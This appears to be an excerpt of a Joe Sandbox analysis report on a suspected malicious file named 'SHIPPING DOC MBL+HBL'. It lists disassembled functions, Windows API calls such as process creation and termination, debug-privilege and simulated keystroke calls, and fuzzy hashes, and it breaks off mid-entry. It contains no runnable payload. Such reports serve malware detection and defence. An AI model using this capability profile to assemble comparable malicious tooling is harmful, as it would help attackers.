                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-218231672
                    • Opcode ID: 84016a84103711a5cd0c9ab9ae89d997548bd09f718dd1194da350512920d132
                    • Instruction ID: 9a8718db6d3cc985956e717464e6d296f9c48b868d6dead4116bedda101c79d0
                    • Opcode Fuzzy Hash: 84016a84103711a5cd0c9ab9ae89d997548bd09f718dd1194da350512920d132
                    • Instruction Fuzzy Hash: E391AC70A00219ABDF24DFA5D884FAEBBB8EF45714F109159F519BB282D7709905CFA0
                    Function 00E5A473 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,00E5A844), ref: 00E5A782
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: 26d5fe1364e57bd65ef5dc02d8fc952580fc60629a87ec12f80fba0a77591ce4
                    • Instruction ID: bfbb8cc35c964cbf1207d1baa902ee2f2d9bd0e804976487bf0464f4c22a7703
                    • Opcode Fuzzy Hash: 26d5fe1364e57bd65ef5dc02d8fc952580fc60629a87ec12f80fba0a77591ce4
                    • Instruction Fuzzy Hash: 6591A570A00505ABCB08DF70C4D2BEAFBB5BF44305F18A62ADD99B7181DB70699DCB91
                    Function 00E02E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00E02EAE
                      • Part of subcall function 00E01DB3: GetClientRect.USER32(?,?), ref: 00E01DDC
                      • Part of subcall function 00E01DB3: GetWindowRect.USER32(?,?), ref: 00E01E1D
                      • Part of subcall function 00E01DB3: ScreenToClient.USER32(?,?), ref: 00E01E45
                    • GetDC.USER32 ref: 00E3CEB2
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E3CEC5
                    • SelectObject.GDI32(00000000,00000000), ref: 00E3CED3
                    • SelectObject.GDI32(00000000,00000000), ref: 00E3CEE8
                    • ReleaseDC.USER32(?,00000000), ref: 00E3CEF0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E3CF7B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 11bec5c4d1bbc29b62e804b37f5b8a02a2faf8930a4d7e859e8c68c984f87e0a
                    • Instruction ID: c5ff6bbb54e6db0d7c7380ff0376b50656d27bd30d5d7232e020a266299643cb
                    • Opcode Fuzzy Hash: 11bec5c4d1bbc29b62e804b37f5b8a02a2faf8930a4d7e859e8c68c984f87e0a
                    • Instruction Fuzzy Hash: 56719131500205DFCF269F64C888ABA7BF6FF48314F24626AEE557A1A6C731D891DF60
                    Function 00E78D5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E8F910), ref: 00E78E3D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E8F910), ref: 00E78E71
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E78FEB
                    • SysFreeString.OLEAUT32(?), ref: 00E79015
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: dac75b84e0996426df9965f2b5da2e7a85bc33d1f340127147090bd302cb0748
                    • Instruction ID: 0c04389887f4713b62eb6c9cd625018309b6bce91eb0386a4188adff0bf94053
                    • Opcode Fuzzy Hash: dac75b84e0996426df9965f2b5da2e7a85bc33d1f340127147090bd302cb0748
                    • Instruction Fuzzy Hash: E8F13A71A00109EFCB04DFA4C988EAEB7B9FF49315F109499F919BB251DB31AE45CB50
                    Function 00E7F7A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E7F7C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F95C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F980
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F9C0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F9E2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E7FB5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E7FB90
                    • CloseHandle.KERNEL32(?), ref: 00E7FBBF
                    • CloseHandle.KERNEL32(?), ref: 00E7FC36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: c2682a958c99381dfff741e8b0077c09be8e9f8d4b1a80a88f94dbc571efa40b
                    • Instruction ID: 5a4f80d82bf07770fff346d74593b5a2ef0f9d4c7d78e78df9163d5eaf77cf14
                    • Opcode Fuzzy Hash: c2682a958c99381dfff741e8b0077c09be8e9f8d4b1a80a88f94dbc571efa40b
                    • Instruction Fuzzy Hash: CDE1C331604301DFDB14EF24D891B6ABBE0AF88354F14996DF899AB2A2CB30DC44CB52
                    Function 00E64D68 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E636DB,?), ref: 00E646CC
                      • Part of subcall function 00E646AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E636DB,?), ref: 00E646E5
                      • Part of subcall function 00E64AD8: GetFileAttributesW.KERNEL32(?,00E6374F), ref: 00E64AD9
                    • lstrcmpiW.KERNEL32(?,?), ref: 00E64DE7
                    • _wcscmp.LIBCMT ref: 00E64E01
                    • MoveFileW.KERNEL32(?,?), ref: 00E64E1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: d7c05a151ab9874e2bcb81eb09014fe6f15d582c85fb38230f1326e446334235
                    • Instruction ID: 06a67b40273ac2c1c0189697e42ae994b3979ba26e2afb9e57da386d121a3c4e
                    • Opcode Fuzzy Hash: d7c05a151ab9874e2bcb81eb09014fe6f15d582c85fb38230f1326e446334235
                    • Instruction Fuzzy Hash: F85157F25483859BC724DB90E8819DFB7ECEF84344F00292EF589E3191EF35A6888756
                    Function 00E88677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E88731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 9aec692591f7632b86362a1b57356650d2c587c2124c7d60823c06339f73c9f1
                    • Instruction ID: a5dca04ea5ea47f4490545dcac2cb2f735bf18b4334e395f48c12e7b3399a1ba
                    • Opcode Fuzzy Hash: 9aec692591f7632b86362a1b57356650d2c587c2124c7d60823c06339f73c9f1
                    • Instruction Fuzzy Hash: CE51B170500204FEEB24BB69CE89B993BA4AB05314FE06526FE5DF61E0DF71AD80DB51
                    Function 00E02B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E3C477
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E3C499
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E3C4B1
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E3C4CF
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E3C4F0
                    • DestroyIcon.USER32(00000000), ref: 00E3C4FF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E3C51C
                    • DestroyIcon.USER32(?), ref: 00E3C52B
                      • Part of subcall function 00E8A4E1: DeleteObject.GDI32(00000000), ref: 00E8A51A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 444224c0356ca445311caccc5ca57b29b42f1454d359d6bb919c52477bd23720
                    • Instruction ID: 6c1bc566da2f0ae1c0b27f148c863827ac004beb725e2ba5b4be0961ba06f538
                    • Opcode Fuzzy Hash: 444224c0356ca445311caccc5ca57b29b42f1454d359d6bb919c52477bd23720
                    • Instruction Fuzzy Hash: 83518770600209AFDB24DF25DC89FAA7BE5EB58314F201129FA16B72E0D771ED91DB50
                    Function 00E59930 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E5AC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5AC57
                      • Part of subcall function 00E5AC37: GetCurrentThreadId.KERNEL32 ref: 00E5AC5E
                      • Part of subcall function 00E5AC37: AttachThreadInput.USER32(00000000,?,00E59945,?,00000001), ref: 00E5AC65
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E59950
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E5996D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E59970
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E59979
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E59997
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E5999A
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E599A3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E599BA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E599BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: da23fe003613e663a1aaf69a240c220d5ea95c480d7fc587920dfc0d60add8af
                    • Instruction ID: 109e95de4d8bf8f651f8a41fc7862203334cc336fb6b057f259de9983b653c9e
                    • Opcode Fuzzy Hash: da23fe003613e663a1aaf69a240c220d5ea95c480d7fc587920dfc0d60add8af
                    • Instruction Fuzzy Hash: FD11E171A50218BFF7106B61CC89FAA7B6DEB4C751F100529F648BB0A1CAF25C14DBA4
                    Function 00E58BE3 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E58864,00000B00,?,?), ref: 00E58BEC
                    • HeapAlloc.KERNEL32(00000000,?,00E58864,00000B00,?,?), ref: 00E58BF3
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E58864,00000B00,?,?), ref: 00E58C08
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00E58864,00000B00,?,?), ref: 00E58C10
                    • DuplicateHandle.KERNEL32(00000000,?,00E58864,00000B00,?,?), ref: 00E58C13
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E58864,00000B00,?,?), ref: 00E58C23
                    • GetCurrentProcess.KERNEL32(00E58864,00000000,?,00E58864,00000B00,?,?), ref: 00E58C2B
                    • DuplicateHandle.KERNEL32(00000000,?,00E58864,00000B00,?,?), ref: 00E58C2E
                    • CreateThread.KERNEL32(00000000,00000000,00E58C54,00000000,00000000,00000000), ref: 00E58C48
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: 6b1574e1e2af863b496513cb71a4d76d09bd4d065b15cfb62cf5fa36e1b0a178
                    • Instruction ID: 5baa2cdb305eea9a97fdf996d2dc85337b2afa55fc6375e60df9b6effa4d046f
                    • Opcode Fuzzy Hash: 6b1574e1e2af863b496513cb71a4d76d09bd4d065b15cfb62cf5fa36e1b0a178
                    • Instruction Fuzzy Hash: 9C01BFB5641344FFE710ABA5DC8DF577B6CEB89711F004421FA09EB1A2CA74D814CB20
                    Function 00E79872 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E57432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?,?,00E5777D), ref: 00E5744F
                      • Part of subcall function 00E57432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E5746A
                      • Part of subcall function 00E57432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E57478
                      • Part of subcall function 00E57432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?), ref: 00E57488
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E7991B
                    • _memset.LIBCMT ref: 00E79928
                    • _memset.LIBCMT ref: 00E79A6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E79A97
                    • CoTaskMemFree.OLE32(?), ref: 00E79AA2
                    Strings
                    • NULL Pointer assignment, xrefs: 00E79AF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: 9024df0a5b980ef718d065fceed03ae8c95ff5156bcf6096b67e0b8839b18d80
                    • Instruction ID: 65c6f65eff48e70d891bcffcb32a675cd208674ab6e57a847d48ba7e83c4acfe
                    • Opcode Fuzzy Hash: 9024df0a5b980ef718d065fceed03ae8c95ff5156bcf6096b67e0b8839b18d80
                    • Instruction Fuzzy Hash: 45912871D00229ABDF10DFA5DC81ADEBBB9EF08710F10915AF519B7281DB70AA44CFA0
                    Function 00E86DB2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E86E56
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E86E6A
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E86E84
                    • _wcscat.LIBCMT ref: 00E86EDF
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E86EF6
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E86F24
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 059fc30863df2e3bbda1b15f88323f97ac492798753961e58712a46ca045db6d
                    • Instruction ID: 0d65461cae104f7cf2fe727d31d59814b3a818e3d947c32c56cea62f05e16eba
                    • Opcode Fuzzy Hash: 059fc30863df2e3bbda1b15f88323f97ac492798753961e58712a46ca045db6d
                    • Instruction Fuzzy Hash: B4418F71A00308AFEB21AF64CC85BEAB7E8EF08354F10156AF64DB7191D6729D848B60
                    Function 00E7EA47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E63C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00E63CBE
                      • Part of subcall function 00E63C99: Process32FirstW.KERNEL32(00000000,?), ref: 00E63CCC
                      • Part of subcall function 00E63C99: CloseHandle.KERNEL32(00000000), ref: 00E63D96
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7EAB8
                    • GetLastError.KERNEL32 ref: 00E7EACB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7EAFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7EB77
                    • GetLastError.KERNEL32(00000000), ref: 00E7EB82
                    • CloseHandle.KERNEL32(00000000), ref: 00E7EBB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 87a2ca59cc44fa6d954a3ff6a38fa58360c3b87a16f2d0f2f74921b2d8d00169
                    • Instruction ID: f9eed59e187a53a6b4138bafebae5676df48cdca3ca0368ad2fb017312ce3128
                    • Opcode Fuzzy Hash: 87a2ca59cc44fa6d954a3ff6a38fa58360c3b87a16f2d0f2f74921b2d8d00169
                    • Instruction Fuzzy Hash: B5419D312002019FDB24EF64CC95FADBBE5AF54314F089459F94AAB3D3CB75A848CB95
                    Function 00E6302E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00E630CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: 79319021deb5ac86659693b77102124185e7c2d26f8588bfcca78cab598a4308
                    • Instruction ID: 44bf1762d952bcadf6b63d86bd10c2202e7098c7918a152f06669107b4f7d935
                    • Opcode Fuzzy Hash: 79319021deb5ac86659693b77102124185e7c2d26f8588bfcca78cab598a4308
                    • Instruction Fuzzy Hash: 2A110835688356BAE7305A74FC42CEB679C9F053A4F20202AF900B62C1DAB55F0486A0
                    Function 00E64339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E64353
                    • LoadStringW.USER32(00000000), ref: 00E6435A
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E64370
                    • LoadStringW.USER32(00000000), ref: 00E64377
                    • _wprintf.LIBCMT ref: 00E6439D
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E643BB
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00E64398
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
